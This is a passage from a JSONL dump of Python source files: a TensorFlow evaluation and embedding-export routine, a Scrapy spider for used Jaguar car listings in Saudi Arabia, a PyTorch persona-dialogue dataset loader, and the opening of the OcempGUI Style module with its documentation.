args.test:\n print(\"Warning: --components but not --test, using dev\")\n test_or_train = list(zip(dev, dev_metadata))\n else:\n print(\"Loading testing components\")\n # Make sure memory is free\n del configs, components_dict\n gc.collect()\n configs, components_dict = load_components(args.test_components)\n # TEMP: test one config\n # configs = configs[0]\n # configs = add_weights(configs)\n test_or_train = make_from_components(\n args.n_test,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args)\n else:\n test_or_train = test if args.test else train\n\n # Eval test in batches too\n print(\"Eval test\")\n all_records = []\n\n if args.components and args.test:\n # Add dev messages\n dev_true_examples = list(map(find_true_example, zip(dev_se, dev_sl)))\n dev_convs_true = list(map(find_true_example, zip(dev_convs, dev_sl)))\n dev_convl_true = list(map(find_true_example, zip(dev_convl, dev_labels)))\n\n dev_records = zip(\n dev_msgs,\n dev_convs_true,\n dev_convl_true,\n dev_preds,\n dev_labels,\n (x.relation[0] for x in dev),\n (x.relation_dir for x in dev),\n (c['target'][0] for c in dev_metadata),\n (c['target'][1] for c in dev_metadata),\n (c['distractor'][0] for c in dev_metadata),\n (c['distractor'][1] for c in dev_metadata),\n dev_true_examples,\n itertools.cycle(['dev']))\n all_records.extend(dev_records)\n\n for batch in batches(test_or_train, args.batch_size):\n batch, batch_metadata = zip(*batch)\n if args.model == 'feature':\n if asym:\n bse, bsl, batch_envs, batch_labels = \\\n swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=True)\n else:\n batch_envs, batch_labels = swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=False)\n elif args.model == 'end2end':\n if asym:\n bse, bsl, batch_envs, batch_labels = \\\n swdata.prepare_end2end(batch, max_images, asym=True)\n else:\n batch_envs, batch_labels = swdata.prepare_end2end(\n batch, max_images, asym=False)\n else:\n raise RuntimeError(\"Unknown model {}\".format(args.model))\n\n if asym:\n batch_msgs, batch_preds, batch_convs, batch_convl = session.run(\n [t_msg, t_pred, convs, convl], {\n tfs: bse,\n tls: bsl,\n tfl: batch_envs,\n tll: batch_labels\n })\n else:\n batch_msgs, batch_preds, batch_convs, batch_convl = session.run(\n [t_msg, t_pred, convs, convl], {\n t_features: batch_envs,\n t_labels: batch_labels\n })\n\n bse_true_examples = list(map(find_true_example, zip(bse, bsl)))\n bse_convs_true = list(map(find_true_example, zip(batch_convs, bsl)))\n bse_convl_true = list(map(find_true_example, zip(batch_convl, batch_labels)))\n\n batch_records = zip(\n batch_msgs,\n bse_convs_true,\n bse_convl_true,\n batch_preds,\n batch_labels,\n (x.relation[0] for x in batch),\n (x.relation_dir for x in batch),\n (c['target'][0] for c in batch_metadata),\n (c['target'][1] for c in batch_metadata),\n (c['distractor'][0] for c in batch_metadata),\n (c['distractor'][1] for c in batch_metadata),\n # BSE\n bse_true_examples,\n itertools.cycle(['test']))\n all_records.extend(batch_records)\n\n all_df = pd.DataFrame.from_records(\n all_records,\n columns=('msg', 'convs', 'convl',\n 'pred', 'obs', 'relation', 'relation_dir',\n 'target_shape', 'target_color', 'distractor_shape',\n 'distractor_color', 'example_image', 'phase'))\n all_df.pred = all_df.pred.apply(lambda x: x > 0)\n all_df.obs = all_df.obs.apply(lambda x: x.astype(np.bool))\n all_df['correct'] = pd.Series(\n map(lambda t: np.all(t[0] == t[1]), zip(all_df.pred, all_df.obs)),\n dtype=np.bool)\n all_df.relation = all_df.relation.astype('category')\n all_df.relation_dir = all_df.relation_dir > 0\n for cat_col in [\n 'target_shape', 'target_color', 'distractor_shape',\n 'distractor_color'\n ]:\n all_df[cat_col] = all_df[cat_col].astype('category')\n\n if args.test: # Print test accuracy\n print(\"Test accuracy: {}\".format(all_df.correct.mean()))\n\n if args.save_max is not None:\n all_df = all_df.iloc[:args.save_max]\n\n if not args.no_save_msgs:\n print(\"Saving {} model predictions\".format(all_df.shape[0]))\n all_df.drop(\n ['convs', 'convl'], axis=1\n ).to_pickle((args.msgs_file.format(**vars(args))))\n\n if args.tensorboard_messages:\n # Number of messages limited by sprite size\n ind_size = 64\n sprite_size = 8192\n os.makedirs(args.tensorboard_save, exist_ok=True)\n if all_df.shape[0] > ((sprite_size / ind_size)**2):\n print(\n \"Warning: too many images, will truncate. Increase sprite size!\"\n )\n all_df = all_df.iloc[:(sprite_size / ind_size)**2]\n\n from tensorflow.contrib.tensorboard.plugins import projector\n messages = tf.Variable(\n tf.convert_to_tensor(\n np.vstack(all_df.msg),\n name='messages_embed_raw',\n preferred_dtype=np.float32),\n name='messages_embed')\n convs_embedding = tf.Variable(\n tf.convert_to_tensor(\n np.vstack(all_df.convs),\n name='convs_embed_raw',\n preferred_dtype=np.float32),\n name='convs_embed')\n convl_embedding = tf.Variable(\n tf.convert_to_tensor(\n np.vstack(all_df.convl),\n name='convl_embed_raw',\n preferred_dtype=np.float32),\n name='convl_embed')\n\n # Save and initialize messages to model checkpoint\n embeddings_to_save = [messages, convs_embedding, convl_embedding]\n for emts in embeddings_to_save:\n session.run(emts.initializer)\n saver = tf.train.Saver(embeddings_to_save)\n saver.save(session, os.path.join(args.tensorboard_save, \"model.ckpt\"))\n config = projector.ProjectorConfig()\n\n # Save metadata\n md_path = os.path.join(args.tensorboard_save, 'metadata.tsv')\n md_df = all_df[[\n 'correct', 'target_color', 'target_shape', 'distractor_color',\n 'distractor_shape', 'relation', 'relation_dir', 'phase'\n ]]\n\n # Make target/distractor strings too\n md_df['target'] = pd.Series(\n ['{}-{}'.format(x, y)\n for x, y in zip(md_df.target_shape, md_df.target_color)])\n md_df['distractor'] = pd.Series(\n ['{}-{}'.format(x, y)\n for x, y in zip(md_df.distractor_shape,\n md_df.distractor_color)])\n md_df['config'] = pd.Series(\n ['{}-{}'.format(x, y)\n for x, y in zip(md_df.target,\n md_df.distractor)])\n md_df['same_color'] = md_df.target_color == md_df.distractor_color\n md_df.to_csv(md_path, sep='\\t', index=False)\n\n # Sprites\n sprite_path = os.path.join(args.tensorboard_save, 'sprite.png')\n # Assume 64px sprites\n sprite_arr = np.zeros((sprite_size, sprite_size, 3), dtype=np.float32)\n ex_img_i = 0\n try:\n for si in range(0, sprite_size, ind_size):\n for sj in range(0, sprite_size, ind_size):\n ex_img = all_df.example_image[ex_img_i]\n sprite_arr[si:si + ind_size, sj:sj + ind_size] = ex_img\n ex_img_i += 1\n except KeyError:\n assert ex_img_i == len(all_df.example_image)\n sprite_arr = (sprite_arr * 255).astype(np.uint8)\n imsave(sprite_path, sprite_arr)\n\n # Messages embedding\n for embedding_config in embeddings_to_save:\n this_em = config.embeddings.add()\n this_em.tensor_name = embedding_config.name\n this_em.sprite.image_path = 'sprite.png'\n this_em.sprite.single_image_dim.extend([ind_size, ind_size])\n this_em.metadata_path = 'metadata.tsv'\n\n summary_writer = tf.summary.FileWriter(args.tensorboard_save)\n projector.visualize_embeddings(summary_writer, config)\n","sub_path":"rnn_syn.py","file_name":"rnn_syn.py","file_ext":"py","file_size_in_byte":39605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"478244606","text":"\nimport scrapy\nfrom scrapy_splash import SplashRequest\nfrom scrapy.http import Request,FormRequest\nimport re\nimport uuid\nimport hashlib\nimport logging\nimport subprocess\nimport requests\nimport csv\nimport io\nfrom scrapy.spiders import Spider\nfrom datetime import datetime\nfrom scrapy.http import Request,FormRequest\nimport json\nfrom scrapy.http.headers import Headers\nimport urllib\nfrom collections import OrderedDict\n#from jaguar.items import JaguarItem\nfrom autodata.items import AutodataItem, MetaItem\n\nclass MySpider(Spider):\n name = 'jaguar_sa'\n start_urls = ['http://approved.me.jaguar.com/en_qa/used/saudi-arabia?_ga=2.158721594.1266032569.1556196277-1748026362.1556196277']\n urls= ['http://approved.me.jaguar.com/en_qa/used/saudi-arabia?_ga=2.158721594.1266032569.1556196277-1748026362.1556196277']\n## start_urls = ['http://approved.me.jaguar.com/en_qa/saudi-arabia/used/2018/jaguar/xj/Mohamed_Yousuf_Naghi_Motors_-_Al_Khobar_/_Dammam-110413']\n## urls= ['http://approved.me.jaguar.com/en_qa/saudi-arabia/used/2018/jaguar/xj/Mohamed_Yousuf_Naghi_Motors_-_Al_Khobar_/_Dammam-110413']\n \n \n def start_requests(self):\n for url in self.urls:\n yield SplashRequest(url,callback=self.parse,endpoint='render.html',args={'wait':'5'})\n\n \n\n def parse(self, response):\n print(\"##################\")\n body = response.body\n links = response.xpath(\"//div[contains(@class,'results__vehicle column--nopadding small-12 medium-4 large-3 ')]/a[1]/@href\").extract()\n links = list(OrderedDict.fromkeys(links))\n #print(len(links))\n for link in links:\n web= \"http://approved.me.jaguar.com\"+link\n #yield SplashRequest(web,callback=self.getdata,endpoint='render.html', args={'wait':'15'},headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'})\n yield Request(web, callback=self.getdata, dont_filter = True)\n #yield SplashRequest(web,callback=self.getdata,endpoint='render.html', args={'wait':'15'}, headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'})\n\n def getdata(self,response):\n print(\"******************\")\n item=AutodataItem()\n item2 = MetaItem()\n item[\"Last_Code_Update_Date\"] = \"\"\n item[\"Scrapping_Date\"] = \"\"\n item[\"Country\"] = \"KSA\"\n item[\"City\"] = \"\"\n item[\"Seller_Type\"] = \"Official Dealers\"\n item[\"Seller_Name\"] = \"Universal Motor Agencies\"\n item[\"Car_URL\"] = \"\"\n item[\"Car_Name\"] = \"\"\n item[\"Year\"] = \"\"\n item[\"Make\"] = \"\"\n item[\"model\"] = \"\"\n item[\"Spec\"] = \"\"\n item[\"Doors\"] = \"\"\n item[\"transmission\"] = \"\"\n item[\"trim\"] = \"\"\n item[\"bodystyle\"] = \"\"\n item[\"other_specs_gearbox\"] = \"\"\n item[\"other_specs_seats\"] = \"\"\n item[\"other_specs_engine_size\"] = \"\"\n item[\"other_specs_horse_power\"] = \"\"\n item[\"colour_exterior\"] = \"\"\n item[\"colour_interior\"] = \"\"\n item[\"fuel_type\"] = \"\"\n item[\"import_yes_no_also_referred_to_as_GCC_spec\"] = \"\" \n item[\"mileage\"] = \"\"\n item[\"condition\"] = \"\"\n item[\"warranty_untill_when\"] = \"\"\n item['service_contract_untill_when'] = ''\n item['Price_Currency'] = ''\n item['asking_price_inc_VAT'] = ''\n item['asking_price_ex_VAT'] = ''\n item['warranty'] = 'yes'\n item['service_contract'] = ''\n item['vat'] = 'yes'\n item['mileage_unit'] = ''\n item['engine_unit'] = ''\n item['Last_Code_Update_Date'] = 'Thursday, June 07, 2019'\n item['Scrapping_Date'] = datetime.today().strftime('%A, %B %d, %Y')\n item['autodata_Make'] = ''\n item['autodata_Make_id'] = ''\n item['autodata_model'] = ''\n item['autodata_model_id'] = ''\n item['autodata_Spec'] = ''\n item['autodata_Spec_id'] = ''\n item['autodata_transmission'] = ''\n item['autodata_transmission_id'] = ''\n item['autodata_bodystyle'] = ''\n item['autodata_bodystyle_id'] = ''\n\n item2['src'] = \"approved.me.jaguar.com\"\n item2['ts'] = datetime.utcnow().isoformat()\n item2['name'] = \"jaguar_sa\"\n item2['url'] = response.url\n item2['uid'] = str(uuid.uuid4())\n item2['cs'] = hashlib.md5(json.dumps(dict(item), sort_keys=True).encode('utf-8')).hexdigest()\n item['meta'] = dict(item2)\n item['Car_URL'] = response.url\n item['Source'] = item2['src']\n \n item[\"Country\"] = \"Saudi Arabia\"\n c=0\n d=0\n item[\"Seller_Type\"] = \"Large Independent Dealers\"\n item[\"Seller_Name\"] = \"MOHAMED YOUSUF NAGHI MOTORS\"\n item[\"Car_URL\"] = response.url\n\n name = response.xpath(\"//hgroup/h1[contains(@class,'section-title')]/text()\").get().split()[0]\n arr = response.xpath(\"//tr/td/text()\").extract()\n key = response.xpath(\"//tr/th/text()\").extract()\n for k in range(len(key)):\n if 'Model Year' in key[k]:\n item[\"Year\"] = arr[k]\n elif 'Exterior' in key[k]:\n item[\"colour_exterior\"] = arr[k]\n elif 'Interior' in key[k]:\n item[\"colour_interior\"] = arr[k]\n elif 'Kilometers' in key[k]:\n item['mileage'] = arr[k].split(' ')[0]\n item['mileage_unit'] = arr[k].split(' ')[-1]\n elif 'Transmission' in key[k]:\n item[\"transmission\"] = arr[k].split(' ')[-1]\n elif 'Bodystyle' in key[k]:\n item[\"bodystyle\"] = arr[k].split(' ')[-1]\n #item[\"Doors\"] = arr[k].split(' ')[0]\n d = k\n elif 'Engine' in key[k]:\n item[\"other_specs_engine_size\"] = arr[k].split(' ')[0]\n item['cylinders'] = arr[k].split(' ')[1]\n c=k\n item['engine_unit'] = 'l'\n elif 'Fuel Type' in key[k]:\n item[\"fuel_type\"] = arr[k]\n elif 'Location' in key[k]:\n item[\"City\"] = arr[k]\n \n item[\"Make\"] = \"Jaguar\"\n item[\"Car_Name\"] = item[\"Make\"] + ' ' + ''.join(response.xpath('//hgroup/h1[@class=\"section-title\"]/text()').extract()).replace(arr[c].upper() + ' ','').replace(arr[d].upper(),'').strip()\n item['Price_Currency'] = 'SAR'\n item['asking_price_inc_VAT'] = response.xpath(\"//strong[contains(@class,'price-box')]/text()\").get().split('SAR')[-1].strip()\n yield item \n\n \n\n","sub_path":"spiders/jaguar_sa.py","file_name":"jaguar_sa.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320170231","text":"\nimport os\nimport time\nfrom filelock import FileLock\n\nimport torch\nfrom torch.utils.data.dataset import Dataset\nfrom torch.nn.utils.rnn import pad_sequence\n\nPAD = ''\nSOS = ''\nEOS = ''\nUNK = ''\nPRESET_SPECIAL_TOKENS = [PAD, SOS, EOS, UNK]\nEN_TO_ZH = dict(\n location='地址',\n name='姓名',\n weight='体重',\n gender='性别',\n age='年龄',\n constellation='星座',\n hobby='爱好',\n speciality='特长',\n) \n\n\nclass Vocab:\n def __init__(\n self,\n vocab,\n profiles,\n data_path,\n special_tokens=None\n ):\n self.stoi_map = {}\n self.itos_map = {}\n self.profile_stoi_map = {}\n self.profile_itos_map = {}\n self.binary_lable = dict(\n positive=1,\n negative=0,\n )\n\n if special_tokens is None:\n special_tokens = PRESET_SPECIAL_TOKENS\n else:\n special_tokens = PRESET_SPECIAL_TOKENS + special_tokens\n\n for i, (k, v) in enumerate(profiles.items()):\n self.profile_stoi_map[k] = (i, v)\n self.profile_itos_map[i] = (k, v)\n\n if vocab is None:\n self.__init(data_path, special_tokens)\n return\n\n for k, v in vocab.items():\n self.stoi_map[k] = (v.index, v.count)\n self.itos_map[v.index] = k\n\n i = len(self.stoi_map)\n for k in special_tokens:\n self.stoi_map[k] = [i, 1000]\n self.itos_map[i] = k\n i += 1\n\n def __init(\n self,\n data_path,\n special_tokens=None\n ):\n examples = get_examples(data_path, 'train')\n\n self.stoi_map = {}\n self.itos_map = {}\n\n i = 0\n for post, resp, _ in examples:\n for k in set(post + resp):\n if k not in self.stoi_map:\n self.stoi_map[k] = [i, 0]\n i += 1\n self.stoi_map[k][1] += 1\n\n i = len(self.stoi_map)\n for k in special_tokens:\n self.stoi_map[k] = [i, 1000]\n i += 1\n\n self.itos_map = {i: k for k, (i, _) in self.stoi_map.items()}\n\n def __len__(self):\n return len(self.stoi_map)\n\n def stoi(self, s):\n return self.stoi_map.get(s, self.stoi_map[UNK])[0]\n\n def itos(self, i):\n return self.itos_map[i]\n\n def exists_profile(self, s):\n return s in EN_TO_ZH and EN_TO_ZH[s] in self.profile_stoi_map \\\n or s in self.profile_stoi_map\n\n def profile_stoi(self, s):\n if s in EN_TO_ZH:\n s = EN_TO_ZH[s]\n return self.profile_stoi_map[s][0]\n\n def profile_itos(self, i):\n return self.profile_itos_map[i]\n\n def binary_stoi(self, s):\n return self.binary_lable[s]\n\n def binary_itos(self, i):\n return [k for k, v in self.binary_lable.items() if i == v][0]\n\n\nclass PersonaDataset(Dataset):\n def __init__(\n self,\n vocab,\n max_seq_length,\n data_path,\n cache_path,\n limit_length=None,\n mode='train',\n overwrite_cache=True,\n ):\n # Load data features from cache or dataset file\n cached_features_file = os.path.join(\n cache_path,\n \"cached_{}_{}\".format(\n mode, str(max_seq_length),\n ),\n )\n \n # Make sure only the first process in distributed training processes the dataset,\n # and the others will use the cache.\n lock_path = cached_features_file + \".lock\"\n with FileLock(lock_path):\n if os.path.exists(cached_features_file) and not overwrite_cache:\n start = time.time()\n self.features = torch.load(cached_features_file)\n print(\n f\"Loading features from cached file {cached_features_file} [took %.3f s]\", time.time() - start\n )\n else:\n print(f\"Creating features from dataset file at {data_path}\")\n\n examples = get_examples(data_path, mode)\n if limit_length is not None:\n examples = examples[:limit_length]\n \n self.features = convert_examples_to_features(\n vocab,\n examples,\n max_length=max_seq_length,\n mode=mode,\n )\n start = time.time()\n # torch.save(self.features, cached_features_file)\n # ^ This seems to take a lot of time so I want to investigate why and how we can improve.\n print(\"Saving features into cached file %s [took %.3f s]\" % (cached_features_file, time.time() - start))\n\n def __len__(self):\n return len(self.features)\n\n def __getitem__(self, i):\n return self.features[i]\n\n\ndef get_examples(path, mode):\n post_file_path = os.path.join(path, mode + '.post')\n resp_file_path = os.path.join(path, mode + '.resp')\n key_file_path = os.path.join(path, mode + '.keys')\n\n with open(post_file_path) as f:\n posts = f.read()\n with open(resp_file_path) as f:\n resps = f.read()\n\n keys = ''\n if os.path.exists(key_file_path):\n with open(key_file_path) as f:\n keys = f.read()\n\n def parse(s):\n if len(s) == 0:\n return []\n # last row is blank\n return list(map(lambda x: x.split(), s.split('\\n')))[:-1]\n\n posts_arr = parse(posts)\n resps_arr = parse(resps)\n if keys == '':\n # placehold for early_stage_train\n keys_arr = [['negative', 'name']] * len(posts_arr)\n else:\n keys_arr = parse(keys)\n\n return list(zip(posts_arr, resps_arr, keys_arr))\n\n\ndef convert_examples_to_features(\n vocab,\n examples,\n max_length,\n mode\n):\n ret = []\n for post, resp, key in examples:\n if not vocab.exists_profile(key[1]):\n continue\n ipost = [vocab.stoi(k) for k in post[:max_length]] + [vocab.stoi(EOS)]\n iresp = [vocab.stoi(SOS)] + [vocab.stoi(k) for k in resp[:max_length]] + [vocab.stoi(EOS)]\n ikey = [vocab.binary_stoi(key[0]), vocab.profile_stoi(key[1])]\n ret.append((ipost, iresp, ikey))\n return ret\n\n\ndef convert_profiles_to_features(\n vocab,\n profiles\n):\n return [[vocab.stoi(k), vocab.stoi(v)] \n for k, v in profiles.items()]\n\n\n# https://pytorch.org/tutorials/beginner/text_sentiment_ngrams_tutorial.html?highlight=collate_fn\ndef generate_batch(batch, pad_idx):\n post, resp, key = zip(*batch)\n post_lens = [len(v) for v in post]\n resp_lens = [len(v) for v in resp]\n\n fn = lambda x: list(map(torch.tensor, x)) \n post_pad = pad_sequence(fn(post), padding_value=pad_idx)\n resp_pad = pad_sequence(fn(resp), padding_value=pad_idx)\n key = torch.tensor(key)\n\n return post_pad, resp_pad, post_lens, resp_lens, key\n\n\ndef retokenize(fname):\n import jieba\n res = []\n with open(fname) as f:\n ss = f.read()\n for line in ss.split('\\n'):\n line = line.replace(' ', '')\n line = list(jieba.cut(line))\n line = ' '.join(line)\n res.append(line)\n\n name, ext = os.path.splitext(fname) \n fname_res = name + '_retoken' + ext\n with open(fname_res, 'w') as f:\n ss = '\\n'.join(res)\n f.write(ss)\n\n","sub_path":"AssignPersonality/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4522386","text":"# $Id: Style.py,v 1.66.2.10 2007/05/08 14:52:37 marcusva Exp $\n#\n# Copyright (c) 2004-2006, Marcus von Appen\n# All rights reserved.\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"Style class for widgets.\"\"\"\n\nimport os.path, copy\nfrom collections import UserDict # IterableUserDict\nfrom .Constants import *\nfrom .StyleInformation import StyleInformation\n\n# Import the default theme engine path.\nimport sys\nsys.path.append (DEFAULTDATADIR)\n# from themes import default\n\nclass WidgetStyle (UserDict):\n \"\"\"WidgetStyle (dict=None) -> WidgetStyle\n\n A style dictionary that tracks changes of its items.\n\n The WidgetStyle dictionary class allows one to let a bound method be\n executed, whenever a value of the dictionary changed. Additionally,\n the WidgetStyle class supports recursive changes, so that a\n WidgetStyle object within this WidgetStyle can escalate the value\n change and so on.\n\n To set up the value change handler you can bind it using the\n set_value_changed() method of the WidgetStyle class:\n\n style.set_value_changed (callback_method)\n\n This will cause it and all values of it, which are WidgetStyle\n objects to invoke the callback_method on changes.\n\n To get the actually set value change handler, the\n get_value_changed() method can be used:\n\n callback = style.get_value_changed ()\n \"\"\"\n def __init__ (self, dict=None):\n # Notifier slot.\n self._valuechanged = None\n UserDict.__init__ (self, dict)\n\n def __copy__ (self):\n \"\"\"W.__copy__ () -> WidgetStyle\n\n Creates a shallow copy of the WidgetStyle dictionary.\n \"\"\"\n newdict = WidgetStyle ()\n keys = self.keys ()\n for k in keys:\n newdict[k] = self[k]\n newdict.set_value_changed (self._valuechanged)\n return newdict\n \n def __deepcopy__(self, memo={}):\n \"\"\"W.__deepcopy__ (...) -> WidgetStyle.\n\n Creates a deep copy of the WidgetStyle dictionary.\n \"\"\"\n newdict = WidgetStyle ()\n keys = self.keys ()\n for k in keys:\n newdict[copy.deepcopy (k, memo)] = copy.deepcopy (self[k], memo)\n newdict.set_value_changed (self._valuechanged)\n memo [id (self)] = newdict\n return newdict\n \n def __setitem__ (self, i, y):\n \"\"\"W.__setitem__ (i, y) <==> w[i] = y\n \"\"\"\n UserDict.__setitem__ (self, i, y)\n if isinstance (y, WidgetStyle):\n y.set_value_changed (self._valuechanged)\n if self._valuechanged:\n self._valuechanged ()\n\n def __delitem__ (self, y):\n \"\"\"W.__delitem__ (i, y) <==> del w[y]\n \"\"\"\n IterableUserDict.__delitem__ (self, y)\n if self._valuechanged:\n self._valuechanged ()\n\n def __repr__ (self):\n \"\"\"W.__repr__ () <==> repr (W)\n \"\"\"\n return \"WidgetStyle %s\" % IterableUserDict.__repr__ (self)\n \n def clear (self, y):\n \"\"\"W.clear () -> None\n\n Remove all items from the WidgetStyle dictionary.\n \"\"\"\n changed = self._valuechanged\n self.set_value_changed (None)\n IterableUserDict.clear (self)\n self.set_value_changed (changed)\n if changed:\n changed ()\n\n def pop (self, k, d=None):\n \"\"\"W.pop (k, d=None) -> object\n\n Remove specified key and return the corresponding value.\n\n If key is not found, d is returned if given, otherwise KeyError\n is raised.\n \"\"\"\n changed = IterableUserDict.has_key (self, k)\n v = IterableUserDict.pop (self, k, d)\n if changed and self._valuechanged:\n self._valuechanged ()\n return v\n\n def popitem (self):\n \"\"\"W.popitem () -> (k, v)\n\n Remove and return some (key, value) pair as a 2-tuple\n\n Raises a KeyError if D is empty.\n \"\"\"\n v = IterableUserDict.popitem (self)\n if self._valuechanged:\n self._valuechanged ()\n return v\n\n def setdefault (self, k, d=None):\n \"\"\"W.setdefault (k,d=None) -> W.get (k, d), also set W[k] = d if k not in W\n \"\"\"\n changed = not IterableUserDict.has_key (self, k)\n v = IterableUserDict.setdefault (self, k, d)\n if changed and self._valuechanged:\n self._valuechanged ()\n return v\n\n def update (self, E, **F):\n \"\"\"W.update (E, **F) -> None\n\n Update W from E and F.\n\n for k in E: W[k] = E[k] (if E has keys else: for (k, v) in E:\n W[k] = v) then: for k in F: W[k] = F[k]\n \"\"\"\n amount = len (self)\n UserDict.update (self, E, **F)\n if self._valuechanged and (len (self) != amount):\n self._valuechanged ()\n\n def get_value_changed (self):\n \"\"\"W.get_value_changed (...) -> callable\n\n Gets the set callback method for the dictionary changes.\n \"\"\"\n return self._valuechanged\n \n def set_value_changed (self, method):\n \"\"\"W.set_value_changed (...) -> None\n\n Connects a method to invoke, when an item of the dict changes.\n\n Raises a TypeError, if the passed argument is not callable.\n \"\"\"\n if method and not callable (method):\n raise TypeError (\"method must be callable\")\n\n values = self.values ()\n for val in values:\n if isinstance (val, WidgetStyle):\n val.set_value_changed (method)\n self._valuechanged = method\n\nclass Style (object):\n \"\"\"Style () -> Style\n\n Style class for drawing objects.\n\n Style definitions\n -----------------\n Styles are used to change the appearance of the widgets. The drawing\n methods of the Style class will use the specific styles of the\n 'styles' attribute to change the fore- and background colors, font\n information and border settings of the specific widgets. The styles\n are set using the lower lettered classname of the widget to draw.\n Additionally the Style class supports cascading styles by falling\n back to the next available class name in the widget its __mro__\n list. If no specific set style could be found for the specific\n widget type, the Style class will use the 'default' style entry of\n its 'styles' dictionary.\n\n Any object can register its own style definition and request it\n using the correct key. A Button widget for example, could register\n its style definition this way:\n\n Style.styles['button'] = WidgetStyle ({ .... })\n\n Any other button widget then will use this style by default, so\n their look is all the same.\n\n It is also possible to pass an own type dictionary to the drawing\n methods of the attached engine class in order to get a surface,\n which can be shown on the screen then:\n\n own_style = WidgetStyle ({ ... })\n surface = style.engine.draw_rect (width, height, own_style)\n\n If the style should be based on an already existing one, the\n copy_style() method can be used to retrieve a copy to work with\n without touching the orignal one:\n\n own_style = style.copy_style (my_button.__class__)\n\n The BaseWidget class offers a get_style() method, which will copy\n the style of the widget class to the specific widget instance. Thus\n you can safely modify the instance specific style for the widget\n without touching the style for all widgets of that class.\n\n The style dictionaries registered within the 'styles' dictionary of\n the Style class need to match some prerequisites to be useful. On\n the one hand they need to incorporate specific key-value pairs,\n which can be evaluated by the various drawing functions, on the\n other they need to have some specific key-value pairs, which are\n evaluated by the Style class.\n\n The following lists give an overview about the requirements the\n style dictionaries have to match, so that the basic Style class can\n work with them as supposed.\n\n Style entries\n -------------\n The registered style WidgetStyle dictionaries for the widgets need\n to contain key-value pairs required by the functions of the\n referenced modules. The following key-value pairs are needed to\n create the surfaces:\n\n bgcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n\n The background color to use for the widget surface.\n\n fgcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n\n The foreground color to use for the widget. This is also the text\n color for widgets, which will display text.\n\n lightcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n darkcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n\n Used to create shadow border effects on several widgets. The color\n values usually should be a bit brighter or darker than the bgcolor\n values.\n\n bordercolor = WidgetStyle ({ STATE_TYPE : color, ... })\n \n Also used to create border effects on several widgets. In contrast\n to the lightcolor and darkcolor entries, this is used, if flat\n borders (BORDER_FLAT) have to drawn.\n\n shadowcolor = (color1, color2)\n\n The colors to use for dropshadow effects. The first tuple entry will\n be used as inner shadow (near by the widget), the second as outer\n shadow value.\n\n image = WidgetStyle ({ STATE_TYPE : string })\n\n Pixmap files to use instead of the background color. If the file is\n not supplied or cannot be loaded, the respective bgcolor value is\n used.\n \n font = WidgetStyle ({ 'name' : string, 'size' : integer,\n 'alias' : integer, 'style' : integer })\n\n Widgets, which support the display of text, make use of this\n key-value pair. The 'name' key denotes the font name ('Helvetica')\n or the full path to a font file ('/path/to/Helvetica.ttf'). 'size'\n is the font size to use. 'alias' is interpreted as boolean value for\n antialiasing. 'style' is a bit-wise combination of FONT_STYLE_TYPES\n values as defined in ocempgui.draw.Constants and denotes additional\n rendering styles to use.\n\n shadow = integer\n\n The size of the 3D border effect for a widget.\n\n IMPORTANT: It is important to know, that the Style class only\n supports a two-level hierarchy for styles. Especially the\n copy_style() method is not aware of style entries of more than two\n levels. This means, that a dictionary in a style dictionary is\n possible (as done in the 'font' or the various color style entries),\n but more complex style encapsulations are unlikely to work\n correctly.\n Some legal examples for user defined style entries:\n\n style['ownentry'] = 99 # One level\n style['ownentry'] = { 'foo' : 1, 'bar' : 2 } # Two levels: level1[level2]\n\n This one however is not guaranteed to work correctly and thus should\n be avoided:\n\n style['ownentry'] = { 'foo' : { 'bar' : 1, 'baz' : 2 }, 'foobar' : { ... }}\n\n Dicts and WidgetStyle\n ---------------------\n\n OcempGUI uses a WidgetStyle dictionary class to keep track of\n changes within styles and to update widgets on th fly on changing\n those styles. When you are creating new style files (as explained in\n the next section) you do not need to explicitly use the\n WidgetStyle() dictionary, but can use plain dicts instead. Those\n will be automatically replaced by a WidgetStyle on calling load().\n\n You should however avoid using plain dicts if you are modifying\n styles of widgets or the Style class at run time and use a\n WidgetStyle instead:\n\n # generate_new_style() returns a plain 